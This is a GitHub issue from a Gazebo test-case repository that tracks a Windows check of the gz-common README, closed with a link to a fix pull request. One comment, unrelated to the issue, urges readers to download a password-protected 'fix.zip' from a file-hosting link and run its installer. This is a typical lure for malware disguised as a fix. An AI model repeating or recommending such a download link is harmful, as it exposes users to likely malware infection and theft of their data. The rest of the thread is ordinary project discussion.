gazebosim/gazebo_test_cases #1093: gz-common: README

azeey-test, 2024-08-29:
## Configuration

* os: Windows

## Links

* [Live](https://gazebosim.org/libs/common)
* [Source](https://github.com/gazebosim/gz-common/blob/gz-common6/README.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

Kudjo-Grand, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

avanmalleghem, 2024-09-11:
There is no OS specific stuff in this one. But going through it, I saw small issues. Here is the PR : https://github.com/gazebosim/gz-common/pull/639

closed 2024-09-11 by azeey